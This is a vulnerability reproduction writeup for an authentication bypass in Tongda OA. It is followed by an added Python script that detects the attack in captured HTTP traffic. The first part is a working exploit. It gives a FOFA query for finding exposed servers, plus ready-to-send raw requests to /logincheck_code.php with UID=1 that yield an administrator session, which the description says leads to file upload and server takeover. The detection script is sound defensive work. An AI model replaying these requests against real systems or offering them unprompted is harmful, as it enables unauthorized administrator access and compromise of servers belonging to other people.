T10-30通达-OA-PermissionAC
Vulnerability description:
An attacker can craft a malicious request to log in as the system administrator account, and then upload malicious files through the management backend to take control of the web server.
Website screenshot:
Network mapping:
FOFA query:
app.name="通达 OA"
Vulnerability reproduction:
Obtain a cookie
/logincheck_code.php
Submit a POST request with the body "CODEUID={code_uid}&UID=1" to obtain a cookie.
Request:
POST /logincheck_code.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
CODEUID={546DF670-FBDB-251D-D4AA-CD5C6C976592}&UID=1
Log in to the system with the obtained cookie
/general/index.php?is_modify_pwd=1
Replace the cookie with the PHPSESSID value obtained in the previous step and log in.
GET /general/index.php?is_modify_pwd=1 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=afni33n5if6hi6s26i3b2h79j3;
Connection: close
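Detection logic for the two-step flow above, as an added example that is not part of the original writeup: it parses raw HTTP requests (for example from a reverse-proxy or WAF capture), flags a POST to /logincheck_code.php that carries a client-supplied UID, and notes when the same source then requests /general/index.php?is_modify_pwd=1. The sample traffic is constructed from the requests shown above; it assumes a legitimate QR-code login does not let the browser choose UID.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample traffic, modelled on the two requests in the writeup.
SAMPLE_REQUESTS = [
    ("10.0.0.5", "POST /logincheck_code.php HTTP/1.1\r\nHost: oa.example\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
     "CODEUID={546DF670-FBDB-251D-D4AA-CD5C6C976592}&UID=1"),
    ("10.0.0.5", "GET /general/index.php?is_modify_pwd=1 HTTP/1.1\r\nHost: oa.example\r\n"
     "Cookie: PHPSESSID=afni33n5if6hi6s26i3b2h79j3;\r\n\r\n"),
    ("10.0.0.9", "GET /general/index.php HTTP/1.1\r\nHost: oa.example\r\n\r\n"),
]

def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, query and body params."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    return {
        "method": method,
        "path": parts.path,
        "query": parse_qs(parts.query),
        "body": parse_qs(body),
    }

def check_login_request(req):
    """Return a finding string for a client-chosen-UID login attempt, else None.
    Assumption: the legitimate QR-code login never sends UID from the client."""
    if req["method"] != "POST" or req["path"] != "/logincheck_code.php":
        return None
    uid = req["body"].get("UID")
    if not uid:
        return None  # no client-chosen identity: nothing to flag
    sev = "high" if uid[0] == "1" else "medium"  # UID=1 is the admin account
    return f"{sev}: client-supplied UID={uid[0]} to /logincheck_code.php"

def scan(requests):
    """Scan (source, raw_request) pairs; also record when a flagged source
    then opens the password-change page used in the writeup's second step."""
    findings, flagged = [], set()
    for src, raw in requests:
        req = parse_request(raw)
        hit = check_login_request(req)
        if hit:
            flagged.add(src)
            findings.append((src, hit))
        elif (src in flagged and req["path"] == "/general/index.php"
              and req["query"].get("is_modify_pwd") == ["1"]):
            findings.append((src, "follow-up: is_modify_pwd=1 after flagged login"))
    return findings
```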